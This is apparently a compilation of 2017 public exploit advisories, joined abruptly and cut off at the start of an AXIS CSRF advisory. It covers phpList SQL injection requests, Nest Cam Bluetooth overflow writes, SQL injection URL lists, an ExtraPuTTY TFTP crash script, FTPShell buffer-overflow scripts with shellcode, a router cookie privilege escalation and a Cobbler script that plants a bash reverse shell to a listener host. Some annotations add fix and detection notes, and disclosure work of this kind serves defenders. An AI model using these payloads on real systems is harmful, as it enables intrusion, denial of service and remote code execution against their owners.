The application contains two SQL injections, one of which is in the administration area and one which requires no credentials. Additionally, at least one query is not properly protected against injections. Furthermore, a query in the administration area discloses some information on the password hashes of users.
3. Details
SQL Injection 1: Edit Subscription
CVSS: High 7.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L (note: the vector as written scores 7.3 under the CVSS v3.0 formula; the 7.1 figure appears to be a transcription error)
It is possible for an unauthenticated user to perform an SQL injection when updating the subscription information of an already subscribed user.
The protection against SQL injection relies on a combination of a custom magic quotes function which applies addslashes to all input values and a function which applies htmlspecialchars to all inputs. Additionally, some input values are cast to integers to prevent injections. addslashes protects against injections into arguments which are placed into single quotes, while htmlspecialchars protects against injections into double quotes.
It should be noted that neither addslashes nor htmlspecialchars is a recommended defence against SQL injection: addslashes is not aware of the connection character set, and htmlspecialchars is an output-encoding function for HTML. Prepared statements with bound parameters (or, at minimum, the database driver's own escaping function together with strict integer casts) should be used instead.
The update functionality is vulnerable to SQL injection because it interpolates the keys of the POST array into the query: the magic-quotes emulation applies addslashes only to POST values, never to keys.
Proof of Concept:
POST /lists/index.php?p=subscribe&uid=f8082b7cc4da7f94ba42d88ebfb5b1e2&email=foo%40example.com HTTP/1.1
Host: localhost
Connection: close
Content-Length: 209
email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2 or extractvalue(1,version()) %5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&update=Subscribe+to+the+selected+newsletters%27
The proof of concept is chosen for simplicity and will only work if error messages are displayed to the user. If this is not the case, other techniques can be used to extract data from the database.
Code:
/lists/admin/subscribelib2.php
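$lists = '';
// Each key of $_POST['list'] is the id of a list the subscriber asked to
// join.  The magic-quotes emulation only addslashes() POST *values*, never
// keys, so the key must be forced to an integer before it is interpolated
// into the SQL statement below (this was the unauthenticated injection).
if (is_array($_POST['list'])) {
    foreach ($_POST['list'] as $key => $val) {
        if ($val !== 'signup') {
            continue;
        }
        // Strict cast: anything that is not a plain integer id becomes 0
        // and can never reach the query as SQL text.
        $listid = (int) $key;
        $result = Sql_query("replace into
{$GLOBALS['tables']['listuser']} (userid,listid,entered)
values($userid,$listid,now())");
        # $lists .= " * ".$_POST["listname"][$key]."\n";
    }
}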
SQL Injection 2: Sending Campaign (Admin)
CVSS: Medium 4.7 CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
When sending a campaign, the sendformat parameter is vulnerable to SQL injection. The injection takes place into an UPDATE, so the easiest way to extract data is via error based SQL injection.
An account with the right to send campaigns is required to exploit this issue.
Proof of Concept:
POST /lists/admin/?page=send&id=2&tk=c&tab=Format HTTP/1.1
Host: localhost
Cookie: PHPSESSID=k6m0jgl4niq7643hohik5jgm12
Connection: close
Content-Length: 323
formtoken=27211e65922b95d986bfaf706ccd2ca0&workaround_fck_bug=1&followupto=http%3A%2F%2Flocalhost%2Flists%2Fadmin%2F%3Fpage%3Dsend%26id%3D2%26tk%3Dc%26tab%3DScheduling&htmlformatted=auto&sendformat=HTML"
or extractvalue(1,version()) -- -
&id=2&status=draft&id=2&status=draft&campaigntitle=campaign+meta%27%22%3E&testtarget=
Code:
// /lists/admin/send_core.php:198
// Vulnerable excerpt from /lists/admin/send_core.php:198, quoted as evidence (not fixed here).
// The UPDATE is built with sprintf; every string argument is wrapped in sql_escape() except
// $messagedata['sendformat'] (the injection point the advisory demonstrates) and
// $messagedata['repeatinterval'] (also passed raw; whether it is reachable with attacker
// content is not shown on this page). A prepared statement would remove the need to audit
// each argument individually.
$result = Sql_Query(
sprintf('update %s set
subject = "%s", fromfield = "%s", tofield = "%s",
replyto ="%s", embargo = "%s", repeatinterval = "%s",
repeatuntil = "%s",
message = "%s", textmessage = "%s", footer = "%s", status = "%s",
htmlformatted = "%s", sendformat = "%s", template = "%s"
where id = %d',
$tables['message'],
sql_escape(strip_tags($messagedata['campaigntitle'])),
/* we store the title in the subject field. Better would
be to rename the DB column, but this will do for now */
sql_escape($messagedata['fromfield']),
sql_escape($messagedata['tofield']),
sql_escape($messagedata['replyto']),
// NOTE(review): the format string reads 'd-d-d d:d' in this listing (here and again below);
// the '%' conversion characters look like they were lost when the advisory was extracted —
// verify against the original source before drawing conclusions about the date fields.
sprintf('d-d-d d:d',
$messagedata['embargo']['year'],
$messagedata['embargo']['month'], $messagedata['embargo']['day'],
$messagedata['embargo']['hour'],
$messagedata['embargo']['minute']),
$messagedata['repeatinterval'], // not wrapped in sql_escape()
sprintf('d-d-d d:d',
$messagedata['repeatuntil']['year'],
$messagedata['repeatuntil']['month'],
$messagedata['repeatuntil']['day'],
$messagedata['repeatuntil']['hour'],
$messagedata['repeatuntil']['minute']),
sql_escape($messagedata['message']),
sql_escape($messagedata['textmessage']),
sql_escape($messagedata['footer']),
sql_escape($messagedata['status']), $htmlformatted ? '1'
: '0', $messagedata['sendformat'], // <-- not wrapped in sql_escape(); this is the injection the PoC uses
sql_escape($messagedata['template']), $id
)
);
Sort By: Password (Admin)
CVSS: Low 2.2 CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N
When viewing users, the sortby parameter can be used to sort the list. The drop-down list allows sorting by email, dates, and so on. All non-word characters are removed, but there are no further checks.
It is possible to gather some information on the passwords of users via this parameter, as it can be set to sort by password.
By repeatedly changing the password of an existing user, the characters of a password hash could be brute-forced by observing the position of the attacker-controlled user in the sorted list.
An account with the right to view users is required to exploit this issue.
Proof of Concept:
http://localhost//lists/admin/?page=users&start=0&find=&findby=&sortby=password&sortorder=desc&change=Go&id=0&find=&findby=email
Insufficient Protection against SQL Injection
CVSS: n/a
When subscribing a user, metadata is saved in the database. When saving this data to the database, it is neither properly escaped nor are prepared statements used; the input is only HTML encoded.
Because of this, an unauthenticated user has control over part of the query.
This issue is not currently exploitable, but may become exploitable if changes are made to the query. The approach of HTML encoding instead of using prepared statements to defend against SQL injection is also more error-prone and may result in further vulnerable queries.
A user can create a database error with the following request:
POST /lists/index.php?p=subscribe&id=a\ HTTP/1.1
Host: localhost
Cookie: PHPSESSID=8h5fh18cqe41a2l1t6224tf9v4
Connection: close
formtoken=5bf7774ff0f2e396081dc1478cd92201&makeconfirmed=0&email=foo%40example.com&emailconfirm=foo%40example.com&textemail=1&list%5B2%5D=signup&listname%5B2%5D=newsletter&VerificationCodeX=&subscribe=Subscribe+to+the+selected+newsletters%27
The resulting query is:
insert into phplist_user_user_history (ip,userid,date,summary,detail,systeminfo)
values("127.0.0.1",2,now(),"Re-Subscription","[...]","
HTTP_USER_AGENT = [...]
REQUEST_URI = /lists/index.php?p=subscribe&id=a\")
It can be seen that the backslash in the request escapes the closing quote of the query, which causes an error.
4. Solution
To mitigate this issue please upgrade at least to version 3.3.1:
https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Please note that a newer version might already be available.
5. Report Timeline
01/10/2017 Informed Vendor about Issue
01/16/2017 Vendor confirms
02/15/2017 Asked Vendor to confirm that new release fixes issues
02/15/2017 Vendor confirms
02/20/2017 Disclosed to public
# Exploit Title: Google Nest Cam - Multiple Buffer Overflow Conditions Over Bluetooth LE
# Reported to Google: October 26, 2016
# Public Disclosure: March 17, 2017
# Exploit Author: Jason Doyle @_jasondoyle
# Vendor Homepage: https://nest.com/
# Affected: Dropcam, Dropcam Pro, Nest Cam Indoor/Outdoor models
# Tested Version: 5.2.1
# Fixed Version: TBD
# https://github.com/jasondoyle/Google-Nest-Cam-Bug-Disclosures/blob/master/README.md
==Bluetooth (BLE) based Buffer Overflow via SSID parameter==
1. Summary
It's possible to trigger a buffer overflow condition when setting the SSID parameter on the camera. The attacker must be in Bluetooth range at any time while the camera is powered on. Bluetooth is never disabled, even after initial setup.
2. Proof of Concept
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a031201AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
3. Details
The payload declares an SSID length of 1 byte but sends 16 bytes of value.
SequenceNum=3a + Type=0312 + Length=01 + Value=AA*16
4. Result
Crash and reboot back to operational state
==Bluetooth (BLE) based Buffer Overflow via Encrypted Password parameter==
1. Summary
It's possible to trigger a buffer overflow condition when setting the encrypted password parameter on the camera. The attacker must be in Bluetooth range at any time while the camera is powered on. Bluetooth is never disabled, even after initial setup.
2. Proof of Concept
anon@ubuntu:~/nest$ gatttool -b 18:B4:30:5D:00:B8 -t random -I
[18:B4:30:5D:00:B8][LE]> connect
Attempting to connect to 18:B4:30:5D:00:B8
Connection successful
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3a03120b506574536d6172742d356e1a01AAAAAA
[18:B4:30:5D:00:B8][LE]> char-write-req 0xfffd 3b
Characteristic value was written successfully
Characteristic value was written successfully
[18:B4:30:5D:00:B8][LE]>
(gatttool:20352): GLib-WARNING **: Invalid file descriptor.
3. Details
The payload declares an encrypted Wi-Fi password length of 1 byte but sends 3 bytes of value.
SequenceNum=3a + Type=0312 + Length=0b + ssidVal=506574536d6172742d356e + type=1a + length=01 + encPass=AA*3
# # # # #
# Exploit Title: Joomla! Component jCart for OpenCart v2.0 - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Demo: http://demos.soft-php.com/jcart/
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_jcart&route=product/product&product_id=[SQL]
# # # # #
# # # # #
# Exploit Title: Joomla! Component JooCart (Joomla OpenCart Integration) v2.x - SQL Injection
# Google Dork: N/A
# Date: 20.03.2017
# Vendor Homepage: http://soft-php.com
# Software: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=4478
# Demo: http://demo.soft-php.com
# Version: 2.x
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_opencart&route=product/product&product_id=[SQL]
# # # # #
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/EXTRAPUTTY-TFTP-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.extraputty.com
Product:
======================
ExtraPuTTY - v029_RC2
hash: d7212fb5bc4144ef895618187f532773
Also Vulnerable: v0.30 r15
hash: eac63550f837a98d5d52d0a19d938b91
ExtraPuTTY is a fork from 0.67 version of PuTTY.
ExtraPuTTY has all the features from the original soft and adds others.
Below is a short list of the principal features (see all features):
DLL frontend
TestStand API ( LabWindows ,TestStand 2012)
timestamp
StatusBar
Scripting a session with lua 5.3.
Automatic sequencing of commands.
Shortcuts for pre-defined commands.
Keyboard shortcuts for pre-defined command
Portability (use of directories structure)
Integrates FTP, TFTP, SCP, SFTP, Ymodem and Xmodem transfer protocols
Integrates PuTTYcyg,PuTTYSC, HyperLink, zmodem and session manager projects
Change default settings from configuration file
Change putty settings during session
PuTTYcmdSender : tool to send command or keyboard shortcut to multiple putty windows
Vulnerability Type:
=======================
TFTP Denial of Service
CVE Reference:
==============
CVE-2017-7183
Security Issue:
================
The TFTP server component of ExtraPuTTY is vulnerable to a remote Denial of Service attack triggered by sending large junk UDP
Read/Write TFTP protocol request packets.
Open ExtraPuTTY Session Manager, select => Files Transfer => TFTP Server, run below Python exploit.
Then, BOOM
(100c.30c): Access violation - code c0000005 (first/second chance not available)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll -
eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000
eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
ntdll!ZwWaitForMultipleObjects+0x15:
Exploit/POC:
=============
# Quoted PoC for CVE-2017-7183 (ExtraPuTTY TFTP server DoS). The listing lost its
# indentation in extraction: the bodies of the if/elif/try/except blocks below are meant to
# be indented. Python 2 syntax (print statement, raw_input).
import socket
print "ExtraPuTTY v029_RC2 TFTP Server"
print "Remote Denial Of Service 0day Exploit"
print "John Page AKA hyp3rlinx\n"
TARGET=raw_input("[IP]>")
TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>"))
# 2000-byte filename field, far larger than any legitimate TFTP request. The crash class is a
# server that copies the filename into a fixed buffer without a length check; the fix is a
# bounds check on the request parser, and the detection signal is an RRQ/WRQ datagram of this
# size hitting UDP/69.
CRASH="A"*2000
PORT = 69
if TYPE==1:
PAYLOAD = "\x00\x01"  # TFTP opcode 1 = read request (RRQ)
PAYLOAD += CRASH + "\x00"  # NUL-terminated filename
PAYLOAD += "netascii\x00"  # NUL-terminated transfer mode
elif TYPE==2:
PAYLOAD = "\x00\x02"  # TFTP opcode 2 = write request (WRQ)
PAYLOAD += CRASH + "\x00"
PAYLOAD += "netascii\x00"
# Any other TYPE leaves PAYLOAD unbound and the sendto() below raises NameError.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Liveness probe. Note the Python escapes: "\T" stays a literal backslash followed by T and
# "\n" is a newline, so this is not the well-formed RRQ the text suggests; any reply at all
# satisfies the check below.
s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT))
recv = s.recvfrom(255)
# recvfrom() returns a (data, address) tuple and never None, so this condition is always
# true once a reply arrives; a timeout would instead raise and land in the except branch.
if recv != None:
print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET)
s.sendto(PAYLOAD, (TARGET, PORT))
except Exception:
print 'Server not avail, try later'
s.close()  # s is only bound inside the try; if socket() itself raised this is a NameError
Network Access:
===============
Remote
Severity:
=========
Medium
Disclosure Timeline:
===============================
Vendor Notification: No reply
March 20, 2017 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: HttpServer 1.0 DolinaySoft Directory Traversal
# Date: 2017-03-19
# Exploit Author: malwrforensics
# Software Link: http://www.softpedia.com/get/Internet/Servers/WEB-Servers/HttpServer.shtml#download
# Version: 1.0
# Tested on: Windows
Exploiting this issue will allow an attacker to view arbitrary files
within the context of the web server.
Example:
Assuming the root folder is c:\<app_folder>\<html_folder>
http://<server>/..%5c..%5c/windows/win.ini
# Quoted PoC: writes a crafted password string to Ev1lstr1ng.txt for manual use through the
# FTPShell Server UI (see the usage text printed at the end). Python 2 syntax. Nothing is
# executed locally beyond writing the file.
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FTPShell Server 6.56 ChangePassword DEP off BufferOverflow 0Day
# Date: 2017.03.19
# Exploit Author: Greg Priest
# Version: FTPShell Server 6.56
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''
# Layout per the author's variable names: 1249 bytes of filler, a 4-byte value labelled
# jmp_esp (presumably the return-address overwrite), a 10-byte NOP sled, then the payload.
# Root-cause class (inferred from the title): the password field is copied into a fixed-size
# buffer without a length check. The fix is to bound that copy; a password change request
# carrying a value this long is the detection signal.
overflow = "A" * 1249
jmp_esp = "\xC8\x28\x3C\x76"
nop = "\x90" * 10
# Payload bytes as given by the author; the page does not state what they do.
shellcode=(
"\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
evilstring = overflow+jmp_esp+nop+shellcode
# `file` shadows the Python 2 builtin of the same name.
file = open ('Ev1lstr1ng.txt', "w")
file.write(evilstring)
file.close  # attribute lookup only (missing "()"): the file is never explicitly closed; CPython flushes it when the object is collected
print '''
Instruction how to use it:
-DEP turn off: C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
1)Manage FTP Account-->
2)Change pass Ev1lstr1ng.txt -->
3)Do you really change...? --> click NO!!
Succesfully Exploitation!!
'''
# # # # #
# Exploit Title: Secure Download Links - SQL Injection
# Google Dork: N/A
# Date: 19.03.2017
# Vendor Homepage: http://sixthlife.net/
# Software: http://sixthlife.net/product/secure-download-links/
# Demo: http://www.satyamtechnologies.net/secdown/example.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?dc=[SQL]
# # # # #
# # # # #
# Exploit Title: Omegle Clone - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://www.turnkeycentral.com/scripts/omegle-clone/
# Demo: http://demo.turnkeycentral.com/omegleclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/randomChat.php?userId=[SQL]
# http://localhost/[PATH]/listenToReceive.php?userId=[SQL]
# http://localhost/[PATH]/typing.php?userId=[SQL]
# http://localhost/[PATH]/isTyping.php?strangerId=[SQL]
# http://localhost/[PATH]/saveLog.php?userId=[SQL]
# pc_settings :AdminID
# pc_settings :AdminPass
# pc_settings :Email
# pc_settings :PayPal
# pc_settings :IpnMode
# Etc..
# # # # #
Title:
======
Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.
CVE Details:
============
CVE-2017-6896
Reference:
==========
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896
https://vuldb.com/sv/?id.97954
https://www.indrajithan.com/DIGISOL_router_previlage_escaltion
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
13-03-2017
Vendor:
======
The DIGISOL router is a product of Smartlink Network Systems Ltd., one of India's leading networking companies. It was established in the year 1993 to serve the Indian market in the field of network infrastructure.
Product:
=======
DIGISOL DG-HR1400 is a wireless Router
Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf
Abstract details:
=================
A privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker to escalate their user privilege to admin just by modifying the Base64-encoded session cookie value.
Affected Version:
=============
<=1.00.02
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
8
Proof Of Concept :
==================
1) Log in to the router as a User; the router sets the session cookie value to VVNFUg== (Base64 encoding of "USER").
2) Encode "ADMIN" to Base64 and set the session cookie value to QURNSU4=.
3) Refresh the page and you are able to escalate your USER privileges to ADMIN.
Disclosure Timeline:
======================================
Vendor Notification: 13/03/17
# # # # #
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://turnkeycentral.com/scripts/social-dating-script/
# Demo: http://demo.turnkeycentral.com/ifdate/index.php
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
# http://localhost/[PATH]/members_search_results.php?country=[SQL]
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
# http://localhost/[PATH]/members_search_results.php?online=[SQL]
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
# http://localhost/[PATH]/my_profile.php?username=[SQL]
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
# members :id
# members :username
# members :email
# members :password
# members :signup_date
# members :signup_ip
# members :banned
# members :active
# members :is_admin
# Etc..
# # # # #
# Quoted PoC: writes a crafted session-name string to evilstring.txt for manual use through
# the FTPShell Client UI. Python 2 syntax. Nothing is executed locally beyond writing the file.
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
# Date: 2017.03.17
# Exploit Author: Greg Priest
# Version: FTPShell Client 6.53
# Tested on: Windows7 x64 HUN/ENG Professional
'''
# Layout per the author's variable names: 460 bytes of filler, a 4-byte value `b` (presumably
# the return-address overwrite), a 10-byte NOP sled, the payload, then 1638 bytes of trailing
# filler. Root-cause class (inferred from the title): the session name is copied into a
# fixed-size buffer without a length check; bounding that copy is the fix.
a = "A" * 460
b = '\xDC\xE8\x65\x76'
nop = '\x90' * 10
c = "C" * 1638
#calc.exe
# Payload bytes as given by the author, labelled calc.exe above; not verified here.
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
evilstring = a+b+nop+shellcode+c
# `file` shadows the Python 2 builtin of the same name.
file = open ('evilstring.txt', "w")
file.write(evilstring)
file.close  # attribute lookup only (missing "()"): the file is never explicitly closed; CPython flushes it when the object is collected
print evilstring
#!/usr/bin/python
"""
# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805
Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.
Vulnerability Description
=========================
Authenticated RCE
"""
import uuid
import sys
import requests
# Custom variables
# Lab values as given in the advisory (private-range addresses); the listener string is a
# host/port pair consumed by Cobbler.post_payload() below.
cobbler_server = 'http://192.168.2.235/cobbler_web/'
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'
# Cobbler variables
# NOTE: cobbler_server already ends in '/', so each of these URLs contains '//' before the
# path segment — worth knowing when matching these requests in web-server access logs.
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
# First segment of a uuid4 (8 hex chars), presumably to avoid colliding with an existing repo name.
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]
# Quoted PoC client for the Cobbler web UI. Indentation was lost in extraction: the methods
# belong to the class and their bodies to the methods. Uses the third-party `requests` module
# and the module-level cobbler_* / netcat_listener values defined above.
class Cobbler():
# Logs in with a Django-style CSRF flow: fetch the page to receive the csrftoken cookie, then
# POST the credentials with the same token in the form body and a Referer header.
def __init__(self):
self.client = requests.session()
self.client.get('%s' % cobbler_server)
self.csrftoken = self.client.cookies['csrftoken']
self.headers = dict(Referer=cobbler_url)
self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
self.client.post(cobbler_url, data=self.login_data, headers=self.headers)
# Creates a throwaway yum/i386 repository record so that a later reposync has something to process.
# The response is not checked, so a failed save only shows up when get_shell() does not work.
def create_repo(self):
print("Creating dummy repository...")
self.repoinfo = dict(
csrfmiddlewaretoken=self.csrftoken,
editmode='new',
subobject='False',
submit='Save',
arch='i386',
breed='yum',
comment='',
keep_updated='',
mirror='',
name=cobbler_repo_name,
owners='admin',
rpm_list='',
proxy='',
apt_components='',
apt_dists='',
createrepo_flags='',
environment='',
mirror_locally='',
priority='99',
yumopts='')
self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)
# Saves the `reposync_flags` setting with a value that is a shell command fragment rather than
# reposync options. Per the advisory this is the RCE: the setting is taken from the web form
# and (inferred — the vulnerable server code is not on this page) reaches the command line
# that reposync runs without validation. Server-side fix: allow-list the accepted flags and
# invoke the sync tool without a shell. Detection: a POST to /setting/save that changes
# reposync_flags to anything other than plain option tokens, followed by a POST to /reposync.
def post_payload(self):
print("Configuring reposync flags with the payload...")
self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)
# Runs the three steps in order; the final reposync POST is presumably what makes the stored
# flags take effect.
def get_shell(self):
self.create_repo()
self.post_payload()
print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)
# Script entry point: the login happens in the constructor, then the three-step chain runs.
if __name__ == '__main__':
cobbler = Cobbler()
cobbler.get_shell()
sys.exit()  # explicit exit with status 0; the script would end here anyway
# # # # #
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
# Google Dork: N/A
# Date: 17.03.2017
# Vendor Homepage: http://webstarslab.com
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
# Demo: http://webstarslab.com/departmental-store-management-system/store/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
# tbl_users:id
# tbl_users:username
# tbl_users:password
# tbl_users:email
# tbl_users:full_name
# tbl_users:permission
# Etc..
# # # # #
0RWELLL4BS
**********
security advisory
olsa-CVE-2015-8255
PGP: 79A6CCC0
@orwelllabs
Advisory Information
====================
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
